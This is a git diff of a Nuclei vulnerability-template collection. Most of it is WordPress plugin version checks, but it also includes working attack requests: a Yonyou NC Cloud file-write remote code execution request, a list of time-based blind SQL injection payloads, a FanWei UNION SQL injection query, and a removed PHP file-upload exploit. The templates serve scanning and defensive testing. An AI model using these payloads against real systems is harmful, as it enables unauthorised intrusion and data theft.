https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml b/poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml new file mode 100644 index 0000000000..010147536e --- /dev/null +++ b/poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml @@ -0,0 +1,59 @@ +id: maxbuttons-64ecf3c81675d9335f44728b57cd5ada + +info: + name: > + WordPress Button Plugin MaxButtons <= 9.7.8 - Full Path Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/maxbuttons/" + google-query: inurl:"/wp-content/plugins/maxbuttons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,maxbuttons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/maxbuttons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "maxbuttons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.7.8') \ No newline at end of file diff --git a/poc/other/purity-of-soul.yaml b/poc/other/purity-of-soul.yaml new file mode 100644 index 0000000000..0c3d0b4de2 --- /dev/null +++ b/poc/other/purity-of-soul.yaml @@ -0,0 +1,59 @@ +id: purity-of-soul + +info: + name: > + Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/purity-of-soul/" + google-query: inurl:"/wp-content/themes/purity-of-soul/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,purity-of-soul,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "purity-of-soul" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/other/responsive-block-editor-addons.yaml b/poc/other/responsive-block-editor-addons.yaml new file mode 100644 index 0000000000..aabcb27aed --- /dev/null +++ b/poc/other/responsive-block-editor-addons.yaml @@ -0,0 +1,59 @@ +id: responsive-block-editor-addons + +info: + name: > + Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/responsive-block-editor-addons/" + google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-block-editor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.8') \ No newline at end of file diff --git a/poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml b/poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml new file mode 100644 index 0000000000..66bb328ceb --- /dev/null +++ b/poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml @@ -0,0 +1,59 @@ +id: rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3 + +info: + name: > + RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rt-easy-builder-advanced-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml b/poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml new file mode 100644 index 0000000000..fa8b834ee8 --- /dev/null +++ b/poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml @@ -0,0 +1,59 @@ +id: simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f + +info: + name: > + Simple Job Board <= 2.12.3 - Authenticated (Editor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-job-board/" + google-query: inurl:"/wp-content/plugins/simple-job-board/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-job-board,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-job-board/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-job-board" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file diff --git a/poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml b/poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml new file mode 100644 index 0000000000..fb96542860 --- /dev/null +++ b/poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml @@ -0,0 +1,59 @@ +id: string-locator-b6189df65fa837d8ca49f92847869143 + +info: + name: > + String Locator <= 2.6.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/string-locator/" + google-query: inurl:"/wp-content/plugins/string-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,string-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "string-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.5') \ No newline at end of file diff --git a/poc/other/visual-composer-starter.yaml b/poc/other/visual-composer-starter.yaml new file mode 100644 index 0000000000..bdb2fa3fc6 --- /dev/null +++ b/poc/other/visual-composer-starter.yaml @@ -0,0 +1,59 @@ +id: visual-composer-starter + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/other/whmpress.yaml b/poc/other/whmpress.yaml new file mode 100644 index 0000000000..69fec89932 --- /dev/null +++ b/poc/other/whmpress.yaml @@ -0,0 +1,59 @@ +id: whmpress + +info: + name: > + WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,whmpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml b/poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml new file mode 100644 index 0000000000..d575645cd6 --- /dev/null +++ b/poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml @@ -0,0 +1,59 @@ +id: order-export-and-more-for-woocommerce + +info: + name: > + Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-export-and-more-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23') \ No newline at end of file diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/sql/BlindSQLAuth.yaml b/poc/sql/BlindSQLAuth.yaml index 6fd8c3c79a..ce5d86554b 100644 --- a/poc/sql/BlindSQLAuth.yaml +++ b/poc/sql/BlindSQLAuth.yaml @@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: KhukuriRimal + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "XOR(if(now()=sysdate(),sleep(7),0))XOR" + - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=7 && duration <=16" + condition: and \ No newline at end of file diff --git a/poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml b/poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml new file mode 100644 index 0000000000..2d88fc2615 --- /dev/null +++ b/poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2023-0926 + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:CVE-2023-0926' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml b/poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml new file mode 100644 index 0000000000..55ddf96859 --- /dev/null +++ b/poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6667 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6667' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml b/poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml new file mode 100644 index 0000000000..d26fcd594a --- /dev/null +++ b/poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml @@ -0,0 +1,59 @@ +id: kbucket-e74990277ea37a8d6eb0543a824bddb7 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.5 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ff5094a-8cf2-4c18-921d-7ec31d60c13a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kbucket,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.5') \ No newline at end of file diff --git a/poc/sql_injection/BlindSQLAuth.yaml b/poc/sql_injection/BlindSQLAuth.yaml index 6fd8c3c79a..ce5d86554b 100644 --- a/poc/sql_injection/BlindSQLAuth.yaml +++ b/poc/sql_injection/BlindSQLAuth.yaml @@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: KhukuriRimal + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "XOR(if(now()=sysdate(),sleep(7),0))XOR" + - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=7 && duration <=16" + condition: and \ No newline at end of file diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 